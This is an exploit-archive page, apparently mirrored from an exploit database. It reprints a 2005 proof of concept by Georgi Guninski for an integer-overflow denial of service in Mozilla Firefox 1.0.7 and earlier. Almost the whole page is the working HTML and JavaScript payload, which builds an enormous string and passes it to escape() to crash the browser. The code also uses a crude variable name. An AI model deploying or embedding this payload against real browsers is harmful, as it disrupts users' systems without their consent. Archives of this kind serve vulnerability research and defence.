[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mozilla Firefox <= 1.0.7 Integer Overflow Denial of Service Exploit
# Published : 2005-09-26
# Author : Georgi Guninski
# Previous Title : Remote File Manager 1.0 Denial of Service Exploit
# Next Title : MultiTheftAuto 0.5 patch 1 Server Crash and MOTD Deletion Exploit
<html>
Copyright Georgi Guninski
<br>
Cannot be used in vulnerability databases
<br>
Especially securityfocus/mitre/cve/cert
<script>
var s=String.fromCharCode(257);
var ki="";
var me="";
for(i=0;i<1024;i++)
{ki=ki+s;}
for(i=0;i<1024;i++)
{me=me+ki;}
var ov=s;
for(i=0;i<28;i++) ov += ov;
for(i=0;i<88;i++) ov += me;
alert("done generating");
var fuckbill=escape(ov);
alert("done escape");
alert(fuckbill);
</script>
</html>
# www.Syue.com [2005-09-26]